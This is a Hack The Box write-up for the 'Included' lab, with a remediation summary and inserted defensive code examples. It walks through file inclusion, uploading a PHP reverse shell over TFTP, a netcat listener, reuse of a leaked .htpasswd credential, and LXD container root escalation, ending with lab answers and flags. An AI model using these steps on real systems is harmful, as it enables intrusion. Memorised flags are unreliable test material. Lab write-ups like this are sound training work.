HacktheBox Write up — Included

13xch, Infosec WatchTower
12 min read, Nov 8, 2023

Background

This box involves a lot of enumeration, a very important aspect of pen-testing. Knowing what avenues you can take to gain a point of entry is just as important of a skill as any other technical skill. Using all available resources to you is important as well, and remember — Google is your best friend.

Answers to HTB at bottom

Executive Summary

This machine has two clear vulnerabilities. The first is that LFI (local file inclusion) is possible: a common attack in which a threat actor modifies a URL so that the web application loads a file from the server’s filesystem that the visitor was never meant to see (https://brightsec.com/blog/local-file-inclusion-lfi/). The second is that TFTP (Trivial File Transfer Protocol) is left enabled on this machine.

For LFI, the simple solution is to stop browser requests from reaching pages that public visitors are not meant to access. Proper filtering of URI requests is needed here, and this can be done with a few methods.

  1. Whitelist Files — Allow only certain file paths to be requested from a browser, i.e. only the pages/paths that external/public visitors should be visiting.
  2. Offline Storage — Do not store configuration files and other directories that may hold sensitive information (backups, important tables) on the web server; store them elsewhere, such as an external database not connected to the web server’s storage.

There are, of course, other methods, but these two will go a long way in preventing this specific attack.
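The whitelist approach above, written out as an added example (not code from the original post or from the box): a resolver for the site’s ?file= parameter, first in the unfiltered form that makes LFI possible and then in an allowlisted form. The page names in PUBLIC_PAGES and the /var/www/html document root are assumptions; the second, path-containment layer is redundant with the allowlist but guards against a future mistake in it.

```python
import os
from urllib.parse import unquote

# Constructed allowlist (not from the box): the only pages a public visitor may request.
PUBLIC_PAGES = {"home.php", "about.php", "contact.php"}
# Assumed document root; Apache on Ubuntu serves /var/www/html by default.
WEB_ROOT = "/var/www/html"


def resolve_vulnerable(file_param: str) -> str:
    """Mirrors an include($_GET['file']) with no filtering: whatever the
    visitor supplies becomes the path that is included, so /etc/passwd or
    /var/lib/tftpboot/reverse-shell.php are accepted as readily as home.php."""
    return unquote(file_param)


def resolve_allowlisted(file_param: str, web_root: str = WEB_ROOT):
    """Hardened resolver. Two layers:
    1. the decoded parameter must be exactly one of the allowlisted names
       (no directory, no traversal, no NUL byte survives an exact comparison);
    2. the resolved path must lie inside the web root, which is redundant
       here but protects against a later allowlist mistake."""
    name = unquote(file_param)
    if name not in PUBLIC_PAGES:
        return None
    root = os.path.realpath(web_root)
    candidate = os.path.realpath(os.path.join(root, name))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


if __name__ == "__main__":
    for probe in ("home.php", "/etc/passwd", "../../../../etc/passwd",
                  "/var/lib/tftpboot/reverse-shell.php", "home.php%00"):
        print(f"{probe!r:45} vulnerable -> {resolve_vulnerable(probe)!r:42} "
              f"allowlisted -> {resolve_allowlisted(probe)!r}")
```

The resolver returns None for anything outside the allowlist; the calling page should answer with a 404 rather than echoing the rejected value back to the client.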

With TFTP, there is one main safeguard we should take: disable it. There are seldom times when TFTP is worth having as a running service on a web server. Given that it has been around since 1981 and runs on UDP rather than TCP, with less reliability and fewer safeguards, this protocol is outdated and a security risk in most organizations.

TFTP is a simple protocol used for transferring files between computers on a network. It’s called “trivial” because it’s really basic and doesn’t have many features compared to other file transfer protocols like FTP or HTTP. TFTP is often used in situations where you just need to quickly send or receive a file without the complexity of a full-fledged file transfer protocol.

Now that we have a few solutions to these problems, let’s uncover how we figured these out.

Methodology

Enumeration

To begin this box, we will nmap the target IP, as we typically do.

nmap -sV 10.129.95.185

Running nmap shows us which ports are open and what services they run, and the -sV flag additionally reports the versions of those services.

From our output, we see one port running a service: port 80. Port 80 is the default port for HTTP servers, more commonly known as websites.

Also of note is the fact that this webpage is being run by Apache, version 2.4.29. Apache is an open source HTTP server platform.

“The Apache HTTP Server Project is an effort to develop and maintain an open-source HTTP server for modern operating systems including UNIX and Windows. The goal of this project is to provide a secure, efficient and extensible server that provides HTTP services in sync with the current HTTP standards.”

To enumerate this port, let’s paste the target IP into a web browser. I use Firefox.

Seen above is the landing page for this website. It appears to be a company’s website, with some information about the company, as well as a page to contact them.

Also to be noted: when we navigated to this webpage in our browser, the URL changed to include a file parameter (?file=home.php):

From this, we can deduce that the website is built with PHP.

PHP (recursive acronym for PHP: Hypertext Preprocessor) is a widely-used open source general-purpose scripting language that is especially suited for web development and can be embedded into HTML.

We can also infer that the web server may be vulnerable to an LFI attack, as mentioned earlier: the ?file=home.php parameter suggests that the file value can be modified to load other files from the server’s filesystem, like configuration or backup files.

We know that this is a Linux target machine, so we can try to navigate to the /etc/passwd file, which, in a Linux OS, contains important information about users in the system.

/etc/passwd is a plain text-based database that contains information for all user accounts on the system. It is owned by root and has 644 permissions. The file can only be modified by root or users with sudo privileges and is readable by all system users.

Let’s change the URL to the following to attempt to navigate to this page:

http://10.129.95.185/?file=/etc/passwd/

Let’s dissect this output.

This first chunk doesn't show us too much, other than some users which we can already assume would be on the system, such as user “root.”

The next chunk shows the same, but when we get to the last line, we see an interesting snippet:

A user “tftp”. This tips us off that the machine could be running a TFTP service, which our nmap scan would not have detected, since by default nmap scans only TCP ports.

To scan UDP ports as well, we can include the flag -sU.

After scanning again with this -sU flag, we see an open port 69, the port used for TFTP.

We have found our point of attack.
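From the defender’s side, every probe made in this enumeration phase lands in the Apache access log. The following is an added example, not part of the original write-up, of detection logic run over constructed log lines that reproduce those requests (the /etc/passwd read, a traversal variant, and the later request for the uploaded script). The PUBLIC_PAGES allowlist and the SENSITIVE_PREFIXES list are assumptions; the log format is Apache’s standard combined format.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache combined log format: client ident user [time] "request" status size "referer" "agent"
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

PUBLIC_PAGES = {"home.php", "about.php", "contact.php"}   # assumed allowlist for this site
SENSITIVE_PREFIXES = ("/etc/", "/proc/", "/var/lib/tftpboot/", "/var/log/", "/home/", "/root/")

# Constructed sample lines reproducing the requests made in this write-up (not a real log).
SAMPLE_LOG = [
    '10.10.14.8 - - [08/Nov/2023:14:02:11 +0000] "GET /?file=home.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '10.10.14.8 - - [08/Nov/2023:14:03:40 +0000] "GET /?file=/etc/passwd/ HTTP/1.1" 200 1613 "-" "Mozilla/5.0"',
    '10.10.14.8 - - [08/Nov/2023:14:05:02 +0000] "GET /?file=../../../../etc/passwd HTTP/1.1" 200 1613 "-" "Mozilla/5.0"',
    '10.10.14.8 - - [08/Nov/2023:14:09:55 +0000] "GET /?file=/var/lib/tftpboot/reverse-shell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
]


def lfi_indicators(file_value: str) -> list:
    """Return the reasons a ?file= value looks like an LFI attempt (empty list if benign)."""
    v = unquote(file_value)   # parse_qs decoded once; a second decode catches %2e%2e-style encoding
    reasons = []
    if v.startswith("/"):
        reasons.append("absolute path")
    if ".." in v:
        reasons.append("directory traversal")
    if "\x00" in v:
        reasons.append("null byte")
    if v.startswith(SENSITIVE_PREFIXES):
        reasons.append("sensitive location")
    if v not in PUBLIC_PAGES:
        reasons.append("not an allowlisted page")
    return reasons


def scan_access_log(lines) -> list:
    """One alert per request line whose file parameter carries LFI indicators."""
    alerts = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue   # not a request line in the expected format
        query = urlsplit(m["target"]).query
        for value in parse_qs(query, keep_blank_values=True).get("file", []):
            reasons = lfi_indicators(value)
            if reasons:
                alerts.append({"ip": m["ip"], "time": m["ts"], "file": value,
                               "status": int(m["status"]), "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in scan_access_log(SAMPLE_LOG):
        print(f"{alert['time']} {alert['ip']} file={alert['file']!r} "
              f"status={alert['status']} reasons={', '.join(alert['reasons'])}")
```

A 200 status on a request for /etc/passwd is the strongest signal here: a correctly filtered application would have answered 404, so status plus indicator together separate a successful include from a mere probe.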

Using TFTP as an Attack Vector

As of now, we have discovered that the machine seems vulnerable to LFI, and if we can use TFTP to upload a malicious script (such as a reverse shell), then we have the ability to navigate to it in our browser, therefore calling upon and running our malicious script.

Let’s first create our reverse shell.

We know that this is a PHP based website, so we will have to do it in the PHP language.

On our local machine, let’s create a file called “reverse-shell.php.”

We can use Google here to look up a PHP reverse shell.

GitHub is a great source for these sorts of things.

GitHub is a platform and cloud-based service for software development and version control using Git, allowing developers to store and manage their code. It provides the distributed version control of Git plus access control, bug tracking, software feature requests, task management, continuous integration, and wikis for every project.

The very first result pulled up is a GitHub page, https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php.

Let’s copy this into our created file, but we cannot forget to change the IP and PORT to our local machine.

We have to remember the port we enter. Port 4444 is what I used, as it is an unused port and easy to remember.

Now that we have our malicious script, we can upload it by starting a TFTP session and using a “put” command to place this file.

We can use the following commands to do so:

tftp 10.129.95.185
put reverse-shell.php
exit

Now, our malicious file has been copied over to the target machine.
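Why the “put” above needs no password is visible in the protocol itself. As an added example (not from the original post or from any tftp implementation), the following parses TFTP packet headers as defined in RFC 1350 and rates a request the way a network monitor watching UDP/69 would: the write request carries a file name and a transfer mode and nothing else, so there is no credential field for the server to check. The EXECUTABLE_SUFFIXES list and the risk levels are assumptions made for the example.

```python
import struct

OPCODES = {1: "RRQ", 2: "WRQ", 3: "DATA", 4: "ACK", 5: "ERROR"}
# File names an upload monitor would treat as high risk on a web host (constructed list).
EXECUTABLE_SUFFIXES = (".php", ".phtml", ".sh", ".py", ".pl", ".cgi")


def build_request(opcode: int, filename: str, mode: str = "octet") -> bytes:
    """RFC 1350 read/write request: 2-byte big-endian opcode, then the file
    name and transfer mode as NUL-terminated ASCII strings. Note what is NOT
    here: no user name, no password, no token. The protocol has no
    authentication, so anything that can reach UDP/69 may read or write."""
    return (struct.pack("!H", opcode) + filename.encode("ascii") + b"\x00"
            + mode.encode("ascii") + b"\x00")


def parse_tftp(packet: bytes) -> dict:
    """Decode the header of a TFTP packet (the part an IDS rule would key on)."""
    if len(packet) < 4:
        raise ValueError("packet too short for a TFTP header")
    (opcode,) = struct.unpack("!H", packet[:2])
    kind = OPCODES.get(opcode)
    if kind in ("RRQ", "WRQ"):
        fields = packet[2:].split(b"\x00")
        if len(fields) < 3:   # filename, mode, and the empty piece after the last NUL
            raise ValueError("truncated request")
        return {"type": kind, "filename": fields[0].decode("ascii", "replace"),
                "mode": fields[1].decode("ascii", "replace").lower()}
    if kind in ("DATA", "ACK"):
        (block,) = struct.unpack("!H", packet[2:4])
        out = {"type": kind, "block": block}
        if kind == "DATA":
            out["length"] = len(packet) - 4   # a block shorter than 512 bytes ends the transfer
        return out
    if kind == "ERROR":
        (code,) = struct.unpack("!H", packet[2:4])
        message = packet[4:].split(b"\x00")[0].decode("ascii", "replace")
        return {"type": kind, "code": code, "message": message}
    raise ValueError(f"unknown opcode {opcode}")


def upload_risk(parsed: dict) -> str:
    """Rate a parsed packet for a monitoring rule. Any read or write is
    unauthenticated; a write of a script into a directory the web server can
    later include is exactly the chain used on this box."""
    if parsed["type"] == "RRQ":
        return "medium"
    if parsed["type"] != "WRQ":
        return "low"
    if parsed["filename"].lower().endswith(EXECUTABLE_SUFFIXES):
        return "high"
    return "medium"


if __name__ == "__main__":
    wrq = build_request(2, "reverse-shell.php")   # the packet the "put" above sends first
    print(wrq, parse_tftp(wrq), upload_risk(parse_tftp(wrq)))
```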

Before we call this file to run, we have to start our netcat listener on our local machine, that way the script has something to call back to.

Netcat is a powerful network monitoring tool you can use on both Linux and Windows to keep everything secure. But what about the “listener” part in Netcat listener? Is it a different application? Actually, Netcat listener is just a way to refer to one of Netcat’s features: “listening in” on open ports. The primary function of Netcat is to read and write data using the TCP and UDP protocols, but it can also eavesdrop, as it were, on other applications.

nc -lvnp 4444

Now that we have a listener propped up, we can use LFI as a way to access and run this script we have copied.

Back in our browser, let’s modify our URL again, this time to the following:

http://10.129.95.185/?file=/var/lib/tftpboot/reverse-shell.php

We use this file path since we “put” a file onto the machine using TFTP, and by default, this is where files will be stored.

The default root directory where files will be stored is /var/lib/tftpboot. — The official ubuntu website.

This page will not finish loading, because the script is now connected back to our netcat listener, so we can check on the listener to see what has happened.

In the image, port 1234 was used, but 4444 could have been used as well.

We can see that we have a connection.

This is a fairly limited shell, so let’s spawn a more interactive shell with Python by running the following command:

python3 -c 'import pty;pty.spawn("/bin/bash")'

This is one of those good one-liners to remember, as it can be used in python-ready Linux environments to give you a better shell, or to spawn a “TTY” shell.

What does the tty command do? It prints the name of the terminal you're using. TTY stands for "teletypewriter."

Knowing what terminal we are using is helpful when we want to escalate our privileges, since we can know what terminal is what user without having to run “id” or “whoami.”

Lateral Movement

We have access as www-data, a user used by web servers to read and write specific files.

The web server has to be run under a specific user. That user must exist. If it were run under root, then all the files would have to be accessible by root and the user would need to be root to access the files. With root being the owner, a compromised web server would have access to your entire system. By specifying a specific ID a compromised web server would only have full access to its files and not the entire server.

We do not have much access or “power” as this user, but we know that we can look around the /var/www/html directory as user www-data, so let’s start there.

This directory holds important files and folders for the webpage to operate, so it is possible that we can uncover some sensitive information by enumerating this directory.

As seen in the image above, we can use ls -al to list the files and folders in “long” (-l) format and also show hidden files (-a). After doing this, we see a file named “.htpasswd.”

.htpasswd is a flat file used to store usernames and passwords for basic authentication on an Apache HTTP Server. The name of the file is given in the .htaccess configuration and can be anything, although “.htpasswd” is the canonical name. The file name starts with a dot because most Unix-like operating systems consider any file that begins with a dot to be hidden.

Perfect. After running “cat” on this file to concatenate it (basically output its contents as text in our shell), we can see a set of credentials:

mike:Sheffield19

This is great news, we now have a set of credentials we can poke around with.
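What made this file useful to an attacker is not that it exists (Apache has to read it to authenticate anyone) but that the password in it was stored in the clear. The following is an added example, not code from the post or from Apache, that audits a .htpasswd file by the storage scheme of each entry: bcrypt, Apache’s apr1 MD5, the unsalted {SHA} form, traditional crypt(3), or plaintext. The sample file is constructed; its first line has the exact form found on the box, the hashed lines are made-up placeholders of the right shape, and the severity labels are the example’s own.

```python
import base64
import hashlib
import hmac
import re


def make_sha1_entry(user: str, password: str) -> str:
    """Build an Apache "{SHA}" entry: base64 of the raw SHA-1 digest. Shown to
    make the format concrete; it is unsalted and not recommended today."""
    digest = hashlib.sha1(password.encode("utf-8")).digest()
    return f"{user}:{{SHA}}{base64.b64encode(digest).decode('ascii')}"


def verify_sha1(entry: str, password: str) -> bool:
    """Check a password against a {SHA} entry with a constant-time comparison."""
    user, _, _ = entry.partition(":")
    return hmac.compare_digest(entry, make_sha1_entry(user, password))


def classify_secret(secret: str) -> str:
    """Identify how a single .htpasswd secret field is stored."""
    if secret.startswith(("$2y$", "$2a$", "$2b$")):
        return "bcrypt"
    if secret.startswith("$apr1$"):
        return "apr1-md5"
    if secret.startswith("{SHA}"):
        return "sha1"
    if re.fullmatch(r"[./0-9A-Za-z]{13}", secret):
        return "crypt"   # DES crypt(3); a 13-character plaintext password would look the same
    return "plaintext"


# Severity per scheme (example's own labels): only bcrypt is acceptable today.
SEVERITY = {"bcrypt": "ok", "apr1-md5": "legacy", "sha1": "weak",
            "crypt": "weak", "plaintext": "critical"}


def audit_htpasswd(text: str) -> list:
    """Return (user, scheme, severity) for every credential line in the file."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        user, _, secret = line.partition(":")
        scheme = classify_secret(secret)
        findings.append((user, scheme, SEVERITY[scheme]))
    return findings


# Constructed sample file. Line 1 mirrors what the box held (password in the clear);
# the other lines are placeholders shaped like the hashed forms htpasswd can emit.
SAMPLE_HTPASSWD = "\n".join([
    "mike:Sheffield19",
    make_sha1_entry("alice", "correct horse"),
    "bob:$apr1$Zx9k3a1b$" + "q" * 22,   # apr1: 8-char salt then 22-char digest (constructed)
    "carol:$2y$10$" + "e" * 53,         # bcrypt, cost 10 (constructed)
])


if __name__ == "__main__":
    for user, scheme, severity in audit_htpasswd(SAMPLE_HTPASSWD):
        print(f"{user:8} {scheme:10} {severity}")
```

Two caveats a practitioner would add: restricting the file’s permissions does not help once an attacker already runs as www-data, since that is the user Apache reads it as; and the apr1 scheme, while still what older htpasswd builds emit by default, is a fast unsalted-MD5 derivative and should be migrated to bcrypt (htpasswd -B).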

Let’s run the following command to switch to user “mike”:

su mike

After entering his password when prompted, we now have another shell as user “mike.”

We can poke around and navigate to his home directory to find the user flag and run “cat” on that as well.

Privilege Escalation

We can run “id” as mike to see what groups this user is part of.

We see that he is part of a group “lxd”, which is the group designated for working with LXC containers.

LXC containers are often considered as something in the middle between a chroot and a full fledged virtual machine. The goal of LXC is to create an environment as close as possible to a standard Linux installation but without the need for a separate kernel.

Not knowing all that much about users in this group, a quick Google search reveals that we can use an “alpine” image to exploit a machine when we have access as a user in this group.

Alpine Linux is a free and open source operating system designed for routers, firewalls, VPNs, VoIP systems, servers, and other embedded devices.
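Both pivots in this box came from reading account databases: the tftp entry in /etc/passwd revealed the UDP service, and mike’s membership in lxd gave the path to root. As an added example, not code from the post, the following parses both files and reports the two things a host audit should surface: system service accounts (each usually corresponds to an installed daemon) and members of groups that are equivalent to root. The sample contents are constructed; user and group names follow what the write-up found, the numeric ids are made up, and the PRIVILEGED_GROUPS list is the example’s own.

```python
# Groups whose members can typically reach root on a Linux host (constructed list;
# lxd is the one that mattered on this box).
PRIVILEGED_GROUPS = {"lxd", "docker", "sudo", "wheel", "adm", "disk", "shadow"}

# Constructed sample content (not the box's real files). Names mirror the write-up;
# the numeric ids are made up.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
tftp:x:108:113:tftp daemon,,,:/var/lib/tftpboot:/usr/sbin/nologin
mike:x:1000:1000:Mike,,,:/home/mike:/bin/bash
"""

SAMPLE_GROUP = """\
root:x:0:
sudo:x:27:
www-data:x:33:
lxd:x:112:mike
tftp:x:113:
mike:x:1000:
"""


def parse_passwd(text: str) -> dict:
    """/etc/passwd: name:password:uid:gid:gecos:home:shell (7 fields; gecos may hold commas)."""
    users = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        name, _pw, uid, gid, gecos, home, shell = line.split(":", 6)
        users[name] = {"uid": int(uid), "gid": int(gid), "gecos": gecos,
                       "home": home, "shell": shell}
    return users


def parse_group(text: str) -> dict:
    """/etc/group: name:password:gid:member1,member2,... (4 fields)."""
    groups = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        name, _pw, gid, members = line.split(":", 3)
        groups[name] = {"gid": int(gid), "members": [m for m in members.split(",") if m]}
    return groups


def service_accounts(users: dict) -> list:
    """System accounts by the Debian/Ubuntu convention 0 < uid < 1000, with their
    home directories. The tftp account's home is the TFTP root the box used."""
    return sorted((name, u["home"]) for name, u in users.items() if 0 < u["uid"] < 1000)


def privileged_group_members(users: dict, groups: dict) -> dict:
    """Map each privileged group to its members, including users whose primary
    gid is that group (those do not appear in the group file's member list)."""
    result = {}
    for gname in sorted(PRIVILEGED_GROUPS):
        g = groups.get(gname)
        if g is None:
            continue
        members = set(g["members"]) | {n for n, u in users.items() if u["gid"] == g["gid"]}
        if members:
            result[gname] = sorted(members)
    return result


if __name__ == "__main__":
    users, groups = parse_passwd(SAMPLE_PASSWD), parse_group(SAMPLE_GROUP)
    print("service accounts:", service_accounts(users))
    print("privileged group members:", privileged_group_members(users, groups))
```

On a real host the same functions can be fed the contents of /etc/passwd and /etc/group directly; an lxd or docker member who is not an administrator is a finding, since that membership is root-equivalent regardless of sudo configuration.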

Editor’s note: This is an instance in which Google is a pen-tester’s best friend. Not knowing a technology, service, software, or protocol is never a dead-end. It is impossible to know every service available, but guaranteed someone else knows about it and has likely put something out there for you to discover and use to your advantage.

We found a great article that will help us use this exploit: https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.

We will use method two:

All we have to do is follow along the steps outlined in this article, and we should get root access.

On our local machine, we will run the following commands:

git clone https://github.com/saghul/lxd-alpine-builder
cd lxd-alpine-builder
sed -i 's,yaml_path="latest-stable/releases/$apk_arch/latest-releases.yaml",yaml_path="v3.8/releases/$apk_arch/latest-releases.yaml",' build-alpine
sudo ./build-alpine -a i686

We also need to prop up an HTTP server on our local machine using a simple python3 command:

python3 -m http.server

This will allow us to use “wget” on the target machine to fetch files from our local machine.

Let’s now get the image file we built over to the target machine.

wget 10.10.14.8:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz

This will download the file to the target machine, and we can now follow along with the rest of the walkthrough.

lxc image import ./alpine*.tar.gz --alias myimage
lxd init
lxc init myimage mycontainer -c security.privileged=true
lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
lxc start mycontainer
lxc exec mycontainer /bin/sh

We run a simple “id” and see that we are root user. We can now head over to /mnt/root/root/root.txt to get our root flag.

Summary

All in all, this box involved a very simple initial exploit with a not-as-simple privilege escalation. If we had been left to our own devices to escalate our privileges to root, we would have had a more difficult time doing so; because other members of the community shared their findings, our skill-set improved with theirs. This serves as an important lesson: always look around for possible solutions online when you seem to hit a wall. Oftentimes an exploit has already been found; you just don’t know it yet.

HacktheBox Answers:

QUESTION 1: What service is running on the target machine over UDP?

TFTP

QUESTION 2: What class of vulnerability is the webpage that is hosted on port 80 vulnerable to? Give the full name, not an acronym.

Local File Inclusion

QUESTION 3: What is the default system folder that TFTP uses to store files?

/var/lib/tftpboot/

QUESTION 4: Which interesting file is located in the web server folder and can be used for Lateral Movement?

.htpasswd

USER FLAG: Submit the flag located in the mike user’s home directory.

a56ef91d70cfbf2cdb8f454c006935a1

QUESTION 5: What is the group that user Mike is a part of and can be exploited for Privilege Escalation?

LXD

QUESTION 6: When using an image to exploit a system via containers, we look for a very small distribution. Our favorite for this task is named after mountains. What is that distribution name?

alpine

QUESTION 7: What flag do we set to the container so that it has root privileges on the host system?

security.privileged=true

QUESTION 8: If the root filesystem is mounted at /mnt in the container, where can the root flag be found on the container after the host system is mounted?

/mnt/root/

ROOT FLAG: Submit the flag located in root’s home directory.

c693d9c7499d9f572ee375d4c14c7bcf

Keywords

Ethical hacking case study, Penetration testing findings, HTB box analysis, Vulnerability assessment report, HTB answers, Cybersecurity testing insights, Hack The Box report, Penetration tester’s analysis, HTB challenge resolution, Ethical hacking techniques, Security assessment report, Hacker’s perspective on HTB, Network penetration testing, Exploitation and remediation, Hack The Box success story, Ethical hacking best practices, Vulnerability identification, Real-world hacking scenario, Penetration testing case study, Practical hacking lessons, htb included
